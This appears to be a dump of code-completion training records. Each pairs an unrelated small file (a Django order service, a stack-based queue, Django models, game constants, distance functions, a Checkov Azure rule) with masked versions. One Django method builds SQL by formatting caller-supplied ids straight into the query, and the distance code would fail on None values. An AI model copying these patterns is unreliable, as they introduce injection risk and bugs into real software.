"step-4": "<mask token>\n\n\nclass DataService:\n\n def __init__(self):\n pass\n\n @staticmethod\n def get_all_orders():\n orders = Order.objects.order_by('-order_date')\n for o in orders:\n o.package_names = ', '.join([p.name for p in list(o.packages.\n all())])\n o.delivery_date = o.deliveryinfo_set.get().delivery_date\n o.delivery_charge = o.deliveryinfo_set.get().charge\n return orders\n <mask token>\n <mask token>\n\n\nclass StaticDataDao(type):\n\n @property\n def delivery_statuses(cls):\n if getattr(cls, '_delivery_statuses', None) is None:\n cls._delivery_statuses = list(DeliveryStatus.objects.all())\n return cls._delivery_statuses\n\n @property\n def calc_parameters(cls):\n if getattr(cls, '_calc_parameters', None) is None:\n m = {}\n for p in list(CalcParameters.objects.all()):\n m[p.name] = p.value\n cls._calc_parameters = m\n return cls._calc_parameters\n\n\nclass StaticDataService(object):\n __metaclass__ = StaticDataDao\n",
"step-5": "from django.db import connection\n\nfrom .models import Order\nfrom .models import Package\nfrom .models import DeliveryStatus\nfrom .models import CalcParameters\n\n\nclass DataService:\n def __init__(self):\n pass\n\n @staticmethod\n def get_all_orders():\n orders = Order.objects.order_by('-order_date')\n # create new variables for display\n for o in orders:\n o.package_names = ', '.join([p.name for p in list(o.packages.all())])\n o.delivery_date = o.deliveryinfo_set.get().delivery_date\n o.delivery_charge = o.deliveryinfo_set.get().charge\n return orders\n\n @staticmethod\n def get_all_packages():\n return Package.objects.all()\n\n @staticmethod\n def get_shopping_list_details(order_ids, dish_ids=None):\n \"\"\"\n :param order_ids: a list of order ids as int or str. Or a single order id as int or str\n :param dish_ids: Restrict shopping list to these dishes.\n A list of dish ids as int or str. Or a single order id as int or str.\n :return: Return shopping list for the given orders\n \"\"\"\n if isinstance(order_ids, str):\n order_ids = [int(order_ids)]\n if isinstance(order_ids, int):\n order_ids = [order_ids]\n if not isinstance(order_ids, list):\n raise Exception('Expecting a single order id or a list of order ids. Got [{ids}]'.format(ids=order_ids))\n\n SQL = \"\"\"select\n d.id dish_id,\n d.name dish_name,\n sum(op.package_qty) dish_qty,\n sum(d.portion_count) portion_count,\n i.name ingredient_name,\n round(sum(di.ingredient_weight * op.package_qty), 2) total_ingredient_weight,\n round(sum(di.ingredient_weight * (i.cost_price/i.measure) * op.package_qty), 2) total_cost_price\n from\n orders o, order_package op, package_dish pd, dish d, dish_ingredient di, ingredient i\n where\n o.id = op.order_id and\n op.package_id = pd.package_id and\n pd.dish_id = d.id and\n d.id = di.dish_id and\n di.ingredient_id = i.id and\n o.id in ({ids})\n group by d.id,\td.name, i.name\n order by d.name, i.name\"\"\".format(ids=','.join([str(x) for x in order_ids]))\n\n with connection.cursor() as cursor:\n cursor.execute(SQL)\n rows = cursor.fetchall()\n\n # return a list of tuples rather than a tuple of tuples\n return [row for row in rows]\n\n\nclass StaticDataDao(type):\n @property\n def delivery_statuses(cls):\n if getattr(cls, '_delivery_statuses', None) is None:\n cls._delivery_statuses = list(DeliveryStatus.objects.all())\n return cls._delivery_statuses\n\n @property\n def calc_parameters(cls):\n if getattr(cls, '_calc_parameters', None) is None:\n m = {}\n for p in list(CalcParameters.objects.all()):\n m[p.name] = p.value\n cls._calc_parameters = m\n return cls._calc_parameters\n\n\nclass StaticDataService(object):\n __metaclass__ = StaticDataDao\n",
"step-ids": [
5,
6,
7,
8,
12
]
}
|
[
5,
6,
7,
8,
12
] |
from __future__ import print_function
class StackQueue(object):
"""Queue implemented with two stacks"""
def __init__(self):
self.stack1 = []
self.stack2 = []
def enqueue(self, data):
self.stack1.append(data)
def dequeue(self):
if self.stack2:
return self.stack2.pop()
else:
while self.stack1:
self.stack2.append(self.stack1.pop())
return self.stack2.pop()
def peek(self):
if self.stack2:
return self.stack2[-1]
else:
while self.stack1:
self.stack2.append(self.stack1.pop())
return self.stack2[-1]
def _test():
pass
def _print():
q = StackQueue()
q.enqueue(1)
q.enqueue(2)
q.enqueue(3)
d1 = q.dequeue()
print(d1)
print(q.peek())
if __name__ == '__main__':
_test()
_print()
|
normal
|
{
"blob_id": "24f6328d578b6145bf86d7b5378a081463936df3",
"index": 9670,
"step-1": "<mask token>\n\n\nclass StackQueue(object):\n <mask token>\n <mask token>\n\n def enqueue(self, data):\n self.stack1.append(data)\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass StackQueue(object):\n \"\"\"Queue implemented with two stacks\"\"\"\n\n def __init__(self):\n self.stack1 = []\n self.stack2 = []\n\n def enqueue(self, data):\n self.stack1.append(data)\n\n def dequeue(self):\n if self.stack2:\n return self.stack2.pop()\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2.pop()\n\n def peek(self):\n if self.stack2:\n return self.stack2[-1]\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2[-1]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass StackQueue(object):\n \"\"\"Queue implemented with two stacks\"\"\"\n\n def __init__(self):\n self.stack1 = []\n self.stack2 = []\n\n def enqueue(self, data):\n self.stack1.append(data)\n\n def dequeue(self):\n if self.stack2:\n return self.stack2.pop()\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2.pop()\n\n def peek(self):\n if self.stack2:\n return self.stack2[-1]\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2[-1]\n\n\ndef _test():\n pass\n\n\ndef _print():\n q = StackQueue()\n q.enqueue(1)\n q.enqueue(2)\n q.enqueue(3)\n d1 = q.dequeue()\n print(d1)\n print(q.peek())\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass StackQueue(object):\n \"\"\"Queue implemented with two stacks\"\"\"\n\n def __init__(self):\n self.stack1 = []\n self.stack2 = []\n\n def enqueue(self, data):\n self.stack1.append(data)\n\n def dequeue(self):\n if self.stack2:\n return self.stack2.pop()\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2.pop()\n\n def peek(self):\n if self.stack2:\n return self.stack2[-1]\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2[-1]\n\n\ndef _test():\n pass\n\n\ndef _print():\n q = StackQueue()\n q.enqueue(1)\n q.enqueue(2)\n q.enqueue(3)\n d1 = q.dequeue()\n print(d1)\n print(q.peek())\n\n\nif __name__ == '__main__':\n _test()\n _print()\n",
"step-5": "from __future__ import print_function\n\n\nclass StackQueue(object):\n \"\"\"Queue implemented with two stacks\"\"\"\n def __init__(self):\n self.stack1 = []\n self.stack2 = []\n\n def enqueue(self, data):\n self.stack1.append(data)\n\n def dequeue(self):\n if self.stack2:\n return self.stack2.pop()\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2.pop()\n\n def peek(self):\n if self.stack2:\n return self.stack2[-1]\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2[-1]\n\n\ndef _test():\n pass\n\n\ndef _print():\n q = StackQueue()\n q.enqueue(1)\n q.enqueue(2)\n q.enqueue(3)\n d1 = q.dequeue()\n print(d1)\n print(q.peek())\n\n\nif __name__ == '__main__':\n _test()\n _print()\n",
"step-ids": [
2,
6,
8,
9,
11
]
}
|
[
2,
6,
8,
9,
11
] |
<|reserved_special_token_0|>
class SonMenu(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
verbose_name = u'二级菜单'
verbose_name_plural = u'二级菜单'
<|reserved_special_token_0|>
class Img(models.Model):
tag = models.CharField(u'类型', max_length=20)
tagId = models.IntegerField(u'序号')
intro = models.CharField(u'描述', max_length=100)
title = models.CharField(u'标题', max_length=100)
slug = models.CharField(u'链接', max_length=100, db_index=True)
class Meta:
verbose_name = u'图片'
verbose_name_plural = u'图片'
def __unicode__(self):
return self.slug
class Article(models.Model):
tag = models.CharField(u'类型', max_length=20)
title = models.CharField(u'标题', max_length=100)
content = models.TextField(u'内容', default=u'', blank=True)
author = models.CharField(u'作者', max_length=100)
pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)
home_display = models.BooleanField(u'首页显示', default=False)
class Meta:
verbose_name = u'文章'
verbose_name_plural = u'文章'
def __unicode__(self):
return self.title
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SonMenu(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
verbose_name = u'二级菜单'
verbose_name_plural = u'二级菜单'
def __unicode__(self):
return self.title
class Img(models.Model):
tag = models.CharField(u'类型', max_length=20)
tagId = models.IntegerField(u'序号')
intro = models.CharField(u'描述', max_length=100)
title = models.CharField(u'标题', max_length=100)
slug = models.CharField(u'链接', max_length=100, db_index=True)
class Meta:
verbose_name = u'图片'
verbose_name_plural = u'图片'
def __unicode__(self):
return self.slug
class Article(models.Model):
tag = models.CharField(u'类型', max_length=20)
title = models.CharField(u'标题', max_length=100)
content = models.TextField(u'内容', default=u'', blank=True)
author = models.CharField(u'作者', max_length=100)
pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)
home_display = models.BooleanField(u'首页显示', default=False)
class Meta:
verbose_name = u'文章'
verbose_name_plural = u'文章'
def __unicode__(self):
return self.title
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FatherMenu(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
verbose_name = u'一级菜单'
verbose_name_plural = u'一级菜单'
<|reserved_special_token_0|>
class SonMenu(models.Model):
title = models.CharField(u'菜单名', max_length=20)
slug = models.CharField(u'链接', max_length=100, db_index=True)
father = models.ForeignKey('seclab.FatherMenu', blank=True, null=True,
verbose_name=u'父菜单')
class Meta:
verbose_name = u'二级菜单'
verbose_name_plural = u'二级菜单'
def __unicode__(self):
return self.title
class Img(models.Model):
tag = models.CharField(u'类型', max_length=20)
tagId = models.IntegerField(u'序号')
intro = models.CharField(u'描述', max_length=100)
title = models.CharField(u'标题', max_length=100)
slug = models.CharField(u'链接', max_length=100, db_index=True)
class Meta:
verbose_name = u'图片'
verbose_name_plural = u'图片'
def __unicode__(self):
return self.slug
class Article(models.Model):
tag = models.CharField(u'类型', max_length=20)
title = models.CharField(u'标题', max_length=100)
content = models.TextField(u'内容', default=u'', blank=True)
author = models.CharField(u'作者', max_length=100)
pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)
home_display = models.BooleanField(u'首页显示', default=False)
class Meta:
verbose_name = u'文章'
verbose_name_plural = u'文章'
def __unicode__(self):
return self.title
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FatherMenu(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
verbose_name = u'一级菜单'
verbose_name_plural = u'一级菜单'
def __unicode__(self):
return self.title
class SonMenu(models.Model):
title = models.CharField(u'菜单名', max_length=20)
slug = models.CharField(u'链接', max_length=100, db_index=True)
father = models.ForeignKey('seclab.FatherMenu', blank=True, null=True,
verbose_name=u'父菜单')
class Meta:
verbose_name = u'二级菜单'
verbose_name_plural = u'二级菜单'
def __unicode__(self):
return self.title
class Img(models.Model):
tag = models.CharField(u'类型', max_length=20)
tagId = models.IntegerField(u'序号')
intro = models.CharField(u'描述', max_length=100)
title = models.CharField(u'标题', max_length=100)
slug = models.CharField(u'链接', max_length=100, db_index=True)
class Meta:
verbose_name = u'图片'
verbose_name_plural = u'图片'
def __unicode__(self):
return self.slug
class Article(models.Model):
tag = models.CharField(u'类型', max_length=20)
title = models.CharField(u'标题', max_length=100)
content = models.TextField(u'内容', default=u'', blank=True)
author = models.CharField(u'作者', max_length=100)
pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)
home_display = models.BooleanField(u'首页显示', default=False)
class Meta:
verbose_name = u'文章'
verbose_name_plural = u'文章'
def __unicode__(self):
return self.title
<|reserved_special_token_1|>
# _*_ coding:utf-8 _*_
from __future__ import unicode_literals
from django.db import models
from django.core.urlresolvers import reverse
# Create your models here.
# 本文件中,用__unicode__代替了__str__,以免在admin界面中显示中文而引发错误。
# 参考:http://blog.csdn.net/jiangnanandi/article/details/3574007
# 或者另一个解决方案:http://blog.sina.com.cn/s/blog_63cf1c510101an74.html
class FatherMenu(models.Model):
title = models.CharField(u"菜单名", max_length=20)
slug = models.CharField(u"链接", max_length=100, db_index=True)
son = models.BooleanField("子菜单?", default=False)
class Meta:
verbose_name = u"一级菜单"
verbose_name_plural = u"一级菜单"
def __unicode__(self):
return self.title
class SonMenu(models.Model):
title = models.CharField(u"菜单名", max_length=20)
slug = models.CharField(u"链接", max_length=100, db_index=True)
father = models.ForeignKey(
'seclab.FatherMenu', blank=True, null=True, verbose_name=u"父菜单")
class Meta:
verbose_name = u"二级菜单"
verbose_name_plural = u"二级菜单"
def __unicode__(self):
return self.title
class Img(models.Model):
tag = models.CharField(u"类型", max_length=20)
tagId = models.IntegerField(u"序号")
intro = models.CharField(u"描述", max_length=100)
title = models.CharField(u"标题", max_length=100)
slug = models.CharField(u"链接", max_length=100, db_index=True)
class Meta:
verbose_name = u"图片"
verbose_name_plural = u"图片"
def __unicode__(self):
return self.slug
class Article(models.Model):
tag = models.CharField(u"类型", max_length=20)
title = models.CharField(u"标题", max_length=100)
content = models.TextField(u"内容", default=u'', blank=True)
author = models.CharField(u"作者", max_length=100)
pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)
home_display = models.BooleanField(u"首页显示", default=False)
class Meta:
verbose_name = u"文章"
verbose_name_plural = u"文章"
def __unicode__(self):
return self.title
|
flexible
|
{
"blob_id": "49b007b723b9c43fb79d5dffa2546c856faf4937",
"index": 8625,
"step-1": "<mask token>\n\n\nclass SonMenu(models.Model):\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n verbose_name = u'二级菜单'\n verbose_name_plural = u'二级菜单'\n <mask token>\n\n\nclass Img(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n tagId = models.IntegerField(u'序号')\n intro = models.CharField(u'描述', max_length=100)\n title = models.CharField(u'标题', max_length=100)\n slug = models.CharField(u'链接', max_length=100, db_index=True)\n\n\n class Meta:\n verbose_name = u'图片'\n verbose_name_plural = u'图片'\n\n def __unicode__(self):\n return self.slug\n\n\nclass Article(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n title = models.CharField(u'标题', max_length=100)\n content = models.TextField(u'内容', default=u'', blank=True)\n author = models.CharField(u'作者', max_length=100)\n pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)\n home_display = models.BooleanField(u'首页显示', default=False)\n\n\n class Meta:\n verbose_name = u'文章'\n verbose_name_plural = u'文章'\n\n def __unicode__(self):\n return self.title\n",
"step-2": "<mask token>\n\n\nclass SonMenu(models.Model):\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n verbose_name = u'二级菜单'\n verbose_name_plural = u'二级菜单'\n\n def __unicode__(self):\n return self.title\n\n\nclass Img(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n tagId = models.IntegerField(u'序号')\n intro = models.CharField(u'描述', max_length=100)\n title = models.CharField(u'标题', max_length=100)\n slug = models.CharField(u'链接', max_length=100, db_index=True)\n\n\n class Meta:\n verbose_name = u'图片'\n verbose_name_plural = u'图片'\n\n def __unicode__(self):\n return self.slug\n\n\nclass Article(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n title = models.CharField(u'标题', max_length=100)\n content = models.TextField(u'内容', default=u'', blank=True)\n author = models.CharField(u'作者', max_length=100)\n pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)\n home_display = models.BooleanField(u'首页显示', default=False)\n\n\n class Meta:\n verbose_name = u'文章'\n verbose_name_plural = u'文章'\n\n def __unicode__(self):\n return self.title\n",
"step-3": "<mask token>\n\n\nclass FatherMenu(models.Model):\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n verbose_name = u'一级菜单'\n verbose_name_plural = u'一级菜单'\n <mask token>\n\n\nclass SonMenu(models.Model):\n title = models.CharField(u'菜单名', max_length=20)\n slug = models.CharField(u'链接', max_length=100, db_index=True)\n father = models.ForeignKey('seclab.FatherMenu', blank=True, null=True,\n verbose_name=u'父菜单')\n\n\n class Meta:\n verbose_name = u'二级菜单'\n verbose_name_plural = u'二级菜单'\n\n def __unicode__(self):\n return self.title\n\n\nclass Img(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n tagId = models.IntegerField(u'序号')\n intro = models.CharField(u'描述', max_length=100)\n title = models.CharField(u'标题', max_length=100)\n slug = models.CharField(u'链接', max_length=100, db_index=True)\n\n\n class Meta:\n verbose_name = u'图片'\n verbose_name_plural = u'图片'\n\n def __unicode__(self):\n return self.slug\n\n\nclass Article(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n title = models.CharField(u'标题', max_length=100)\n content = models.TextField(u'内容', default=u'', blank=True)\n author = models.CharField(u'作者', max_length=100)\n pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)\n home_display = models.BooleanField(u'首页显示', default=False)\n\n\n class Meta:\n verbose_name = u'文章'\n verbose_name_plural = u'文章'\n\n def __unicode__(self):\n return self.title\n",
"step-4": "<mask token>\n\n\nclass FatherMenu(models.Model):\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n verbose_name = u'一级菜单'\n verbose_name_plural = u'一级菜单'\n\n def __unicode__(self):\n return self.title\n\n\nclass SonMenu(models.Model):\n title = models.CharField(u'菜单名', max_length=20)\n slug = models.CharField(u'链接', max_length=100, db_index=True)\n father = models.ForeignKey('seclab.FatherMenu', blank=True, null=True,\n verbose_name=u'父菜单')\n\n\n class Meta:\n verbose_name = u'二级菜单'\n verbose_name_plural = u'二级菜单'\n\n def __unicode__(self):\n return self.title\n\n\nclass Img(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n tagId = models.IntegerField(u'序号')\n intro = models.CharField(u'描述', max_length=100)\n title = models.CharField(u'标题', max_length=100)\n slug = models.CharField(u'链接', max_length=100, db_index=True)\n\n\n class Meta:\n verbose_name = u'图片'\n verbose_name_plural = u'图片'\n\n def __unicode__(self):\n return self.slug\n\n\nclass Article(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n title = models.CharField(u'标题', max_length=100)\n content = models.TextField(u'内容', default=u'', blank=True)\n author = models.CharField(u'作者', max_length=100)\n pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)\n home_display = models.BooleanField(u'首页显示', default=False)\n\n\n class Meta:\n verbose_name = u'文章'\n verbose_name_plural = u'文章'\n\n def __unicode__(self):\n return self.title\n",
"step-5": "# _*_ coding:utf-8 _*_\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.core.urlresolvers import reverse \n# Create your models here.\n\n\n# 本文件中,用__unicode__代替了__str__,以免在admin界面中显示中文而引发错误。\n# 参考:http://blog.csdn.net/jiangnanandi/article/details/3574007\n# 或者另一个解决方案:http://blog.sina.com.cn/s/blog_63cf1c510101an74.html\n\n\nclass FatherMenu(models.Model):\n\n title = models.CharField(u\"菜单名\", max_length=20)\n slug = models.CharField(u\"链接\", max_length=100, db_index=True)\n son = models.BooleanField(\"子菜单?\", default=False)\n\n class Meta:\n verbose_name = u\"一级菜单\"\n verbose_name_plural = u\"一级菜单\"\n\n def __unicode__(self):\n return self.title\n\n\nclass SonMenu(models.Model):\n\n title = models.CharField(u\"菜单名\", max_length=20)\n slug = models.CharField(u\"链接\", max_length=100, db_index=True)\n father = models.ForeignKey(\n 'seclab.FatherMenu', blank=True, null=True, verbose_name=u\"父菜单\")\n\n class Meta:\n verbose_name = u\"二级菜单\"\n verbose_name_plural = u\"二级菜单\"\n\n def __unicode__(self):\n return self.title\n\n\nclass Img(models.Model):\n tag = models.CharField(u\"类型\", max_length=20)\n tagId = models.IntegerField(u\"序号\")\n intro = models.CharField(u\"描述\", max_length=100)\n title = models.CharField(u\"标题\", max_length=100)\n slug = models.CharField(u\"链接\", max_length=100, db_index=True)\n\n class Meta:\n verbose_name = u\"图片\"\n verbose_name_plural = u\"图片\"\n\n def __unicode__(self):\n return self.slug\n\n\nclass Article(models.Model):\n tag = models.CharField(u\"类型\", max_length=20)\n title = models.CharField(u\"标题\", max_length=100)\n content = models.TextField(u\"内容\", default=u'', blank=True)\n author = models.CharField(u\"作者\", max_length=100)\n pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)\n home_display = models.BooleanField(u\"首页显示\", default=False)\n\n class Meta:\n verbose_name = u\"文章\"\n verbose_name_plural = u\"文章\"\n\n def __unicode__(self):\n return self.title\n",
"step-ids": [
7,
8,
10,
11,
14
]
}
|
[
7,
8,
10,
11,
14
] |
"""Toggle the proof color.
Like operating in the menu:
**View** > **Proof Colors** (Ctrl + Y)
"""
# Import local modules
from photoshop import Session
with Session() as ps:
ps.app.runMenuItem(ps.app.stringIDToTypeID("toggleProofColors"))
|
normal
|
{
"blob_id": "1db866ca73bc264d474d5e5086c4a047d7e46546",
"index": 2299,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith Session() as ps:\n ps.app.runMenuItem(ps.app.stringIDToTypeID('toggleProofColors'))\n",
"step-3": "<mask token>\nfrom photoshop import Session\nwith Session() as ps:\n ps.app.runMenuItem(ps.app.stringIDToTypeID('toggleProofColors'))\n",
"step-4": "\"\"\"Toggle the proof color.\n\nLike operating in the menu:\n**View** > **Proof Colors** (Ctrl + Y)\n\n\"\"\"\n# Import local modules\nfrom photoshop import Session\n\n\nwith Session() as ps:\n ps.app.runMenuItem(ps.app.stringIDToTypeID(\"toggleProofColors\"))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Main Parameters
FONTS_PATH = "media/battle_font.ttf"
LEVELS_PATH = "media/levels"
GAME_MUSIC_PATH = "media/sounds/DOOM.ogg"
MENU_MUSIC_PATH = "media/sounds/ANewMorning.ogg"
# GAME Parameters
FONT_SIZE = 30
CELL_WIDTH = 13 * 2
CELL_HEIGHT = 13 * 2
CELL_SIZE = (CELL_WIDTH, CELL_HEIGHT)
FPS = 30
DISPLAY_WIDTH = CELL_WIDTH * 30
DISPLAY_HEIGHT = CELL_HEIGHT * 30
DISPLAY_SIZE = (DISPLAY_WIDTH, DISPLAY_HEIGHT)
RESPAWN_TIME = 64
|
normal
|
{
"blob_id": "513d7e3c34cc9da030e2e018ad2db6972cf440dc",
"index": 5100,
"step-1": "<mask token>\n",
"step-2": "FONTS_PATH = 'media/battle_font.ttf'\nLEVELS_PATH = 'media/levels'\nGAME_MUSIC_PATH = 'media/sounds/DOOM.ogg'\nMENU_MUSIC_PATH = 'media/sounds/ANewMorning.ogg'\nFONT_SIZE = 30\nCELL_WIDTH = 13 * 2\nCELL_HEIGHT = 13 * 2\nCELL_SIZE = CELL_WIDTH, CELL_HEIGHT\nFPS = 30\nDISPLAY_WIDTH = CELL_WIDTH * 30\nDISPLAY_HEIGHT = CELL_HEIGHT * 30\nDISPLAY_SIZE = DISPLAY_WIDTH, DISPLAY_HEIGHT\nRESPAWN_TIME = 64\n",
"step-3": "# Main Parameters\nFONTS_PATH = \"media/battle_font.ttf\"\nLEVELS_PATH = \"media/levels\"\nGAME_MUSIC_PATH = \"media/sounds/DOOM.ogg\"\nMENU_MUSIC_PATH = \"media/sounds/ANewMorning.ogg\"\n\n# GAME Parameters\nFONT_SIZE = 30\nCELL_WIDTH = 13 * 2\nCELL_HEIGHT = 13 * 2\nCELL_SIZE = (CELL_WIDTH, CELL_HEIGHT)\nFPS = 30\nDISPLAY_WIDTH = CELL_WIDTH * 30\nDISPLAY_HEIGHT = CELL_HEIGHT * 30\nDISPLAY_SIZE = (DISPLAY_WIDTH, DISPLAY_HEIGHT)\nRESPAWN_TIME = 64\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
def calculaEuclidiana(obj1,obj2):
soma = 0
for I in range(len(obj1)):
soma += (obj1[I] - obj2[I])**2
return soma ** 0.5
def calculaMinkowski(obj1,obj2,p):
# p = 2 => distancia Euclidiana
# p = 1 => distancia de Manhattan
soma = 0
for I in range(len(obj1)):
soma += (abs(obj1[I] - obj2[I]))**p
return soma ** (1/p)
def delta(obj1,obj2):
if((obj1 == None or obj2 == None) or (obj1 == 'None' or obj2 == 'None')):
return 0
else:
return 1
def calculaMinkowskiNormalizada(obj1,obj2,p):
soma = 0
somaDelta = 0
for I in range(len(obj1)):
if(delta(obj1[I],obj2[I])):
somaDelta+=1
soma += (abs(obj1[I] - obj2[I])) ** p
return (soma ** (1/p))/somaDelta
# def calculaMahalanobis()
obj1 = {}
obj1[0] = 2
obj1[1] = -1
obj1[2] = None
obj1[3] = 0
# print("len ",obj1[2])
obj2 = {}
obj2[0] = 7
obj2[1] = 0
obj2[2] = -4
obj2[3] = 8
# print("Result Euclidiana = ",calculaEuclidiana(obj1,obj2))
# print("Result Minkowski = ", calculaMinkowski(obj1,obj2,2))
# print("Result Minkowski normalizada = ", calculaMinkowskiNormalizada(obj1,obj2,2))
|
normal
|
{
"blob_id": "6c349b7b4d82b37ec1b1ff8e0d35a3557ed1af67",
"index": 4613,
"step-1": "<mask token>\n\n\ndef calculaMinkowski(obj1, obj2, p):\n soma = 0\n for I in range(len(obj1)):\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p)\n\n\n<mask token>\n\n\ndef calculaMinkowskiNormalizada(obj1, obj2, p):\n soma = 0\n somaDelta = 0\n for I in range(len(obj1)):\n if delta(obj1[I], obj2[I]):\n somaDelta += 1\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p) / somaDelta\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef calculaMinkowski(obj1, obj2, p):\n soma = 0\n for I in range(len(obj1)):\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p)\n\n\ndef delta(obj1, obj2):\n if (obj1 == None or obj2 == None) or (obj1 == 'None' or obj2 == 'None'):\n return 0\n else:\n return 1\n\n\ndef calculaMinkowskiNormalizada(obj1, obj2, p):\n soma = 0\n somaDelta = 0\n for I in range(len(obj1)):\n if delta(obj1[I], obj2[I]):\n somaDelta += 1\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p) / somaDelta\n\n\n<mask token>\n",
"step-3": "def calculaEuclidiana(obj1, obj2):\n soma = 0\n for I in range(len(obj1)):\n soma += (obj1[I] - obj2[I]) ** 2\n return soma ** 0.5\n\n\ndef calculaMinkowski(obj1, obj2, p):\n soma = 0\n for I in range(len(obj1)):\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p)\n\n\ndef delta(obj1, obj2):\n if (obj1 == None or obj2 == None) or (obj1 == 'None' or obj2 == 'None'):\n return 0\n else:\n return 1\n\n\ndef calculaMinkowskiNormalizada(obj1, obj2, p):\n soma = 0\n somaDelta = 0\n for I in range(len(obj1)):\n if delta(obj1[I], obj2[I]):\n somaDelta += 1\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p) / somaDelta\n\n\n<mask token>\n",
"step-4": "def calculaEuclidiana(obj1, obj2):\n soma = 0\n for I in range(len(obj1)):\n soma += (obj1[I] - obj2[I]) ** 2\n return soma ** 0.5\n\n\ndef calculaMinkowski(obj1, obj2, p):\n soma = 0\n for I in range(len(obj1)):\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p)\n\n\ndef delta(obj1, obj2):\n if (obj1 == None or obj2 == None) or (obj1 == 'None' or obj2 == 'None'):\n return 0\n else:\n return 1\n\n\ndef calculaMinkowskiNormalizada(obj1, obj2, p):\n soma = 0\n somaDelta = 0\n for I in range(len(obj1)):\n if delta(obj1[I], obj2[I]):\n somaDelta += 1\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p) / somaDelta\n\n\nobj1 = {}\nobj1[0] = 2\nobj1[1] = -1\nobj1[2] = None\nobj1[3] = 0\nobj2 = {}\nobj2[0] = 7\nobj2[1] = 0\nobj2[2] = -4\nobj2[3] = 8\n",
"step-5": "def calculaEuclidiana(obj1,obj2):\n soma = 0\n for I in range(len(obj1)):\n soma += (obj1[I] - obj2[I])**2\n return soma ** 0.5\n\ndef calculaMinkowski(obj1,obj2,p):\n # p = 2 => distancia Euclidiana\n # p = 1 => distancia de Manhattan\n soma = 0\n for I in range(len(obj1)):\n soma += (abs(obj1[I] - obj2[I]))**p\n return soma ** (1/p) \n\ndef delta(obj1,obj2):\n if((obj1 == None or obj2 == None) or (obj1 == 'None' or obj2 == 'None')):\n return 0\n else:\n return 1\n\ndef calculaMinkowskiNormalizada(obj1,obj2,p):\n soma = 0\n somaDelta = 0\n for I in range(len(obj1)):\n if(delta(obj1[I],obj2[I])):\n somaDelta+=1\n soma += (abs(obj1[I] - obj2[I])) ** p\n return (soma ** (1/p))/somaDelta\n\n# def calculaMahalanobis()\n\nobj1 = {}\nobj1[0] = 2\nobj1[1] = -1\nobj1[2] = None\nobj1[3] = 0\n\n# print(\"len \",obj1[2])\n\nobj2 = {}\nobj2[0] = 7\nobj2[1] = 0\nobj2[2] = -4\nobj2[3] = 8\n\n# print(\"Result Euclidiana = \",calculaEuclidiana(obj1,obj2))\n\n# print(\"Result Minkowski = \", calculaMinkowski(obj1,obj2,2))\n\n# print(\"Result Minkowski normalizada = \", calculaMinkowskiNormalizada(obj1,obj2,2))",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):
def __init__(self):
name = 'Ensure function apps are not accessible from all regions'
id = 'CKV_AZURE_62'
supported_resources = ['azurerm_function_app']
categories = [CheckCategories.GENERAL_SECURITY]
super().__init__(name=name, id=id, categories=categories,
supported_resources=supported_resources,
